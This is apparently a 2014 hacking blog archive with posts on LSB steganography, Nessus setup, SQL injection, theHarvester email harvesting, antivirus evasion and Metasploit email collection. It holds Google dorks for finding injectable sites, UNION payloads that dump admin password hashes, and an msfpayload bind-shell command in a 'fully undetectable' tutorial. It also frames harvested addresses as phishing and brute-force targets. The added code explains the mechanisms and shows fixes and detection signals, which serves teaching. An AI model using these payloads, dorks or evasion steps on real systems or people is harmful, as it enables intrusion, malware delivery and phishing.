Tuesday, 28 January 2014

Best Steganography Tools

What is steganography? Steganography is the art of hiding information, data or messages inside an innocuous carrier such as an image, so that the hidden data is not apparent to anyone inspecting the carrier. The advantage over encryption alone is that outsiders do not even realize that communication is taking place: encryption hides the content of a message, steganography hides its existence, and the two are usually combined, because a stego payload that is found and was not encrypted is simply readable.
Steganography comes in different forms:
  1. Hidden information in Text Files
  2. Hidden information in Image Files
  3. Hidden information in Document Files
  4. Hidden information in Video Files
  5. Hidden information in Audio Files
  6. Hidden information in E-Mails

How to Hide a File behind an Image

S-Tools

S-Tools is a steganography tool that hides files in BMP, GIF, and WAV files.
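As an added example, not S-Tools' own code or file format, the following Python shows the mechanism most image steganography tools rely on: writing the payload into the least-significant bit of each pixel value, where a change of at most 1 in 256 is invisible. The "image" is a constructed list of 8-bit grayscale values; a real tool would read them from a BMP or PNG and write them back.

```python
# Added example: least-significant-bit (LSB) image steganography.
# Not S-Tools' code. The cover is a constructed list of 8-bit grayscale pixels.
import struct

HEADER_BYTES = 4  # 32-bit big-endian length prefix so the extractor knows where to stop


def _bits(data: bytes):
    """Yield the bits of `data`, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def capacity(pixels) -> int:
    """Payload bytes that fit: one bit per pixel, minus the length header."""
    return len(pixels) // 8 - HEADER_BYTES


def embed(pixels, payload: bytes) -> list:
    """Return a copy of `pixels` with the length-prefixed payload in the LSBs.

    Each cover value changes by at most 1, which is visually imperceptible.
    """
    if len(payload) > capacity(pixels):
        raise ValueError(f"payload of {len(payload)} bytes exceeds capacity of {capacity(pixels)}")
    framed = struct.pack(">I", len(payload)) + payload
    stego = list(pixels)
    for i, bit in enumerate(_bits(framed)):
        stego[i] = (stego[i] & 0xFE) | bit   # clear the LSB, then set it to the payload bit
    return stego


def extract(pixels) -> bytes:
    """Recover the payload by reading LSBs and honouring the length prefix."""
    def read_bytes(start_pixel: int, count: int) -> bytes:
        out = bytearray()
        for b in range(count):
            value = 0
            for k in range(8):
                value = (value << 1) | (pixels[start_pixel + b * 8 + k] & 1)
            out.append(value)
        return bytes(out)

    length = struct.unpack(">I", read_bytes(0, HEADER_BYTES))[0]
    if length > capacity(pixels):
        # A cover with no payload yields a garbage length; refuse rather than read noise.
        raise ValueError("length prefix does not fit in the cover: no valid payload")
    return read_bytes(HEADER_BYTES * 8, length)


def max_pixel_change(cover, stego) -> int:
    """Largest per-pixel difference between cover and stego; LSB embedding never exceeds 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


if __name__ == "__main__":
    # Constructed 64x64 grayscale cover: a smooth diagonal gradient (4096 pixels).
    cover = [(x + y) % 256 for y in range(64) for x in range(64)]
    secret = b"meet at 2100, bring the key"
    stego = embed(cover, secret)
    print(f"capacity: {capacity(cover)} bytes, max pixel change: {max_pixel_change(cover, stego)}")
    print("recovered:", extract(stego))
```

The length prefix is what lets the extractor stop at the right place; without it the reader would continue into cover-image noise. Note also what this does not give you: the payload is in the clear, so anyone who suspects LSB hiding can run the same extractor, which is why tools like S-Tools encrypt before embedding.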



Monday, 27 January 2014

Enabling Nessus on BackTrack 5

Nessus 4.4.1 now comes pre-installed on BackTrack 5 and requires that the user activate the installation. Before you activate Nessus on your BackTrack 5 installation, be certain you have installed Nessus either to the hard drive on the computer you plan to use or inside of a virtual machine that you plan to keep on the same host system. If you activate Nessus on a bootable USB thumb drive, DVD or a virtual machine and move it to a new host system, the Nessus activation code will no longer be valid.
The Nessus activation ties itself to the physical system on which it is installed. If you do decide to move the virtual machine to a new system, or jump around to different systems using a bootable USB thumb drive or DVD, you will have to re-activate Nessus. If you are using a Nessus ProfessionalFeed, you are allowed to reset your activation by clearing the current connection between a host and an activation code.
 By logging into the Tenable Customer Support Portal and going to "Activation Codes", you can reset the activation code-to-host pairing. ProfessionalFeed users are currently limited to one reset every 30 days. HomeFeed users will need to re-register Nessus when moving between physical hosts.

Step 1 - Obtaining An Activation Code


Once you have Nessus installed on BackTrack 5, you will need to obtain a Nessus activation code. If you wish to purchase a ProfessionalFeed, you can visit the Tenable Store. If you are using Nessus at home or wish to evaluate Nessus, you can register a HomeFeed. It’s important to note that the HomeFeed is limited to 16 IP addresses per scan (whereas the ProfessionalFeed allows you to scan an unlimited number of IP addresses). The ProfessionalFeed also gives you access to features such as Configuration and Sensitive Data Auditing, SCADA plugins, Nessus Technical Support and access to the Tenable Customer Portal.

Step 2 - Activating Nessus

Be certain that your BackTrack 5 installation has access to the Internet and activate Nessus using your newly obtained activation code as follows:

[screenshot of the activation command not reproduced]

Activation also triggers the initial download of the plugins for the feed you registered; the first plugin update takes a few minutes, so wait for it to finish before starting the Nessus service and scanning.

Thursday, 23 January 2014

How To Hack: What is SQL Injection and How Does It Work?



SQL injection is a code-injection attack: user-supplied input (a URL parameter, a form field) is pasted into a SQL query as text instead of being passed as a value, so the attacker can change what the query does. The injected SQL is then used to read from the database and pull out information such as emails, usernames and password hashes.
In this tutorial we will be looking for the admin panel's credentials. Keep in mind, I said admin panel, not control panel. While performing an SQL injection you may not always find what you are looking for: some sites have locked down the important information so that it cannot be compromised so easily.
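To make the mechanism concrete, here is an added example, not code from the original post: the `news.php?id=` lookup from the dorks below written the vulnerable way and the safe way, run against an in-memory SQLite database with constructed rows. The table names, rows and hash value are all made up for the demonstration.

```python
# Added example, not part of the original tutorial: an id lookup done the
# vulnerable way and the safe way, run against constructed SQLite data.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a public news table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news   (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO news   VALUES (1, 'Site launched'), (2, 'Maintenance window');
        INSERT INTO admins VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def news_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """news.php?id=... done wrong: the raw parameter is pasted into the SQL text,
    so anything after the number becomes part of the query (vulnerable on purpose)."""
    sql = f"SELECT title FROM news WHERE id = {id_param}"
    return [row[0] for row in conn.execute(sql)]


def news_safe(conn: sqlite3.Connection, id_param: str) -> list:
    """Same lookup with a bound parameter: the driver sends the input as a value,
    never as SQL, so an injection string simply fails to match any id."""
    return [row[0] for row in conn.execute("SELECT title FROM news WHERE id = ?", (id_param,))]


# What an attacker sends as the id parameter. The UNION appends the admin
# table to the legitimate result set; the tautology dumps every news row.
UNION_PAYLOAD = "1 UNION SELECT username || ':' || password_hash FROM admins"
TAUTOLOGY_PAYLOAD = "0 OR 1=1"


if __name__ == "__main__":
    db = make_db()
    print("normal:     ", news_vulnerable(db, "1"))
    print("tautology:  ", news_vulnerable(db, TAUTOLOGY_PAYLOAD))
    print("union:      ", news_vulnerable(db, UNION_PAYLOAD))
    print("safe, union:", news_safe(db, UNION_PAYLOAD))
```

The UNION trick only works when the injected SELECT returns the same number of columns as the original query (one here); in practice the attacker first finds that count with `ORDER BY n` or by adding `NULL` columns until the error disappears. The fix is not escaping quotes but keeping data out of the SQL text entirely, as `news_safe` does.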

Finding a Vulnerable Site

You can find candidate sites using Google dorks; Google is the best way. A dork is a search query like this:
Code:
inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=
There are hundreds of thousands of others, and there are also posts about dorks, so read those if you want to find a site to test for SQL injection. A dork only finds pages that take a numeric id parameter; whether that parameter is actually injectable still has to be tested, for example by appending a single quote and watching for a database error.

Tutorial: theHarvester – Collect a Company’s Email Addresses, Subdomains, Related Servers

What is theHarvester?
theHarvester was developed in Python by Christian Martorella. It gathers e-mail addresses, user names and hostnames/subdomains from public sources such as search engines and PGP key servers.
The tool is designed to help the penetration tester in the early (reconnaissance) stage; it is effective, simple and easy to use. The sources supported are:
  • Google – emails, subdomains/hostnames
  • Google profiles – Employee names
  • Bing search – emails, subdomains/hostnames, virtual hosts
  • Pgp servers – emails, subdomains/hostnames
  • LinkedIn – Employee names
  • Exalead – emails, subdomain/hostnames

New features:

  • Time delays between requests
  • XML results export
  • Search a domain in all sources
  • Virtual host verifier

Getting Started:

Go to Arsenal -> Scanning -> Web Scanner -> theHarvester.

If it is not available in your distribution, download it from http://code.google.com/p/theharvester/downlaod (version 2.2 was the latest at the time of writing) and extract it.

Give execute permission to theHarvester.py with: chmod 755 theHarvester.py

Change into the extracted directory and run ./theHarvester.py with no arguments; it prints the version and the options that can be used with the tool, each with a description.

The information gathering steps of footprinting and scanning are of utmost importance. Good information gathering can make the difference between a successful penetration test and one that fails to provide maximum benefit to the client. Information is a weapon: a successful penetration test needs a lot of relevant information, which is why information gathering, also called footprinting, is the first step. Gathering valid login names and e-mail addresses is therefore one of the most important parts of a penetration test. We can use them to profile the target, brute-force authentication systems, deliver client-side attacks (through phishing), and search social networks for details on the platforms and technologies in use.

Example 1:
Command Syntax:
theHarvester -d [domain] -l 300 -b [search engine name]

theHarvester -d matriux.com -l 300 -b google
In the above command:

  • -d [domain] is the target domain whose addresses and hosts you want to collect.
  • -l limits the search to the specified number of results.
  • -b selects the data source (search engine) to query.
From the harvested e-mail addresses we can identify the pattern of the addresses assigned to the organization's employees. For example, some companies use the firstname.lastname@domain.com pattern, so the address of a specific person can be predicted even if it never appeared in a search result, and that account can then be targeted for a brute-force or phishing attack. Host information is useful for scanning specific systems.
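The pattern inference above can be automated. Here is an added example, not part of theHarvester, that takes the addresses a harvest returned for a domain together with employee names (theHarvester also collects those, from LinkedIn and Google profiles), scores each common naming convention by how many known names it explains, and predicts the address of a person who did not appear in the results. The address list, the names and the domain example.com are constructed for the demonstration.

```python
# Added example, not theHarvester code: infer an organization's e-mail naming
# convention from harvested addresses plus known employee names, then predict
# an unseen address. All input here is constructed; example.com is a placeholder.
from collections import Counter

# Candidate conventions as functions of (first, last), lower-case ASCII.
PATTERNS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "firstlast":  lambda f, l: f"{f}{l}",
    "first_last": lambda f, l: f"{f}_{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "firstl":     lambda f, l: f"{f}{l[0]}",
    "last.first": lambda f, l: f"{l}.{f}",
    "first":      lambda f, l: f,
}


def local_parts(emails, domain) -> set:
    """Lower-cased local parts of the addresses that belong to `domain`;
    addresses at other domains are dropped so they cannot skew the scores."""
    suffix = "@" + domain.lower()
    cleaned = (e.strip().lower() for e in emails)
    return {e[:-len(suffix)] for e in cleaned if e.endswith(suffix)}


def infer_pattern(emails, domain, people) -> tuple:
    """Score every convention by how many known (first, last) names it turns into
    an address that was actually seen. Returns (pattern, hits) or (None, 0).
    Role accounts such as info@ match no name and are ignored automatically."""
    seen = local_parts(emails, domain)
    scores = Counter()
    for label, fn in PATTERNS.items():
        for first, last in people:
            if fn(first.lower(), last.lower()) in seen:
                scores[label] += 1
    if not scores:
        return None, 0
    label, hits = scores.most_common(1)[0]
    return label, hits


def predict(first, last, domain, pattern) -> str:
    """Address a person would have under `pattern`."""
    return f"{PATTERNS[pattern](first.lower(), last.lower())}@{domain.lower()}"


if __name__ == "__main__":
    # Constructed harvest output and employee names.
    harvested = ["John.Smith@example.com", "maria.lopez@example.com",
                 "info@example.com", "webmaster@example.com", "jdoe@other.example"]
    names = [("John", "Smith"), ("Maria", "Lopez"), ("Ahmed", "Khan")]
    pattern, hits = infer_pattern(harvested, "example.com", names)
    print(f"convention: {pattern} (matched {hits} of {len(names)} names)")
    print("predicted:", predict("Ahmed", "Khan", "example.com", pattern))
```

Two hits out of three names is already a strong signal; a single hit is not, since the `first` and `flast` conventions overlap for short names. When no name matches, the function returns `None` rather than guessing, and the right move is to harvest more names (the LinkedIn source) before predicting anything.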

Example 2:

Search all supported sources at once.

Command:
theHarvester -d gtu.ac.in -l 300 -b all
This command grabs information from every source supported by the installed version of theHarvester.

Example 3:

Save the results to an HTML file. Command:
theHarvester.py -d gtu.ac.in -l 300 -b all -f hackguru
The -f parameter writes the results to an HTML report named after its argument, as shown in this example.

Conclusion

theHarvester is a handy tool that quickly fetches useful information from public sources, mostly by passive means (querying third-party search indexes, so the target sees nothing) and, for the optional DNS brute-force and reverse-lookup options, by active means that do contact the target's name servers.

Suggestion

Exposure of personal information is an advantage for every social engineer. Everything you post on the Internet will eventually stay there forever, so before you post something personal, think twice about whether other people really need to know about you and your activities. Using different e-mail addresses and usernames for different purposes will also make the social engineer's work much more difficult.

Wednesday, 22 January 2014

How To Bypass Antivirus Detection – Making An Executable FUD

In this tutorial we will show you, step by step, how to make an executable harder for antivirus to detect, what forum posts call FUD (fully undetectable). There are many approaches; here we will look at how to do it with msfencode. Bear in mind that encoding only defeats signature-based detection of the payload bytes, and a sample that is undetected today is usually flagged once it has been submitted to the vendors.

Requirements

  • Metasploit (comes on BackTrack or Kali)

Attention

We are using some harmless test files but don’t infect people with any real viruses. That would be a crime.

Purpose

Antivirus protects machines from malware, but not from all of it. There are ways to pack or encode malware so that the bytes a scanner's signatures look for are no longer present in the file. We will use Metasploit to make a payload much harder for antivirus to detect.
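To see why encoding defeats a signature, here is an added example, not Metasploit or msfencode code: a minimal byte-signature scanner, a repeating-key XOR encoder of the kind msfencode's encoders are built on, and the entropy measurement a defender uses to spot encoded sections. The payload and signature are constructed placeholder strings standing in for a real executable and a real AV signature; nothing here is shellcode.

```python
# Added example, not Metasploit code: signature matching versus an XOR-encoded
# payload, plus the entropy side effect. PAYLOAD and SIGNATURE are constructed
# placeholders, not real shellcode or a real AV signature.
import math
import os
from collections import Counter

SIGNATURE = b"shell_bind_tcp"
PAYLOAD = b"MZ\x90\x00 demo stub ... " + SIGNATURE + b" LPORT=2482 ..."


def matches_signature(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """Static AV-style check: does the exact signature byte string occur anywhere?"""
    return signature in blob


def xor_encode(blob: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Applying it again with the same key decodes, which is
    exactly what the small decoder stub an encoder prepends does at run time."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, up to 8.0 for uniformly random bytes.
    Packed or encrypted sections sit near the top, which is itself a detection signal."""
    if not blob:
        return 0.0
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values())


def encode_until_clean(blob: bytes, signature: bytes = SIGNATURE,
                       key_len: int = 16, attempts: int = 32) -> tuple:
    """Mimic 'try random keys until the scanner stops matching'. Returns (key, encoded)."""
    for _ in range(attempts):
        key = os.urandom(key_len)
        if b"\x00" in key:
            continue  # a zero key byte would leave that position unchanged
        encoded = xor_encode(blob, key)
        if not matches_signature(encoded, signature):
            return key, encoded
    raise RuntimeError("no key found that hides the signature")


if __name__ == "__main__":
    key, encoded = encode_until_clean(PAYLOAD)
    print("original matches signature:", matches_signature(PAYLOAD))
    print("encoded matches signature: ", matches_signature(encoded))
    print("decodes back to original:  ", xor_encode(encoded, key) == PAYLOAD)
    print(f"entropy before {shannon_entropy(PAYLOAD):.2f}, after {shannon_entropy(encoded):.2f}")
```

The encoded blob no longer contains the signature, but the decoder stub that restores it has to ship in the clear, so vendors write signatures for the stub instead, and emulation-based engines simply run the stub and scan the decoded result. That is why msfencode output stops being "FUD" quickly and why multiple encoding iterations only buy a little time.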

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine: it opens a command shell listening on TCP port 2482 on the victim (a bind shell), which the attacker then connects to. It is not a virus and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:
cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

Tuesday, 21 January 2014

How to Extract Email Address of Domain using Metasploit

Extracting Emails from Any Website using Metasploit


Here is a very easy tutorial on how to extract e-mail addresses for any domain you want using Metasploit. I will not go into depth; I am going to show it step by step so that everyone can understand it easily.

Start Metasploit.

1) First, open msfconsole and type


Code:
search gather



2) Now type

Code:
use auxiliary/gather/search_email_collector



Friday, 17 January 2014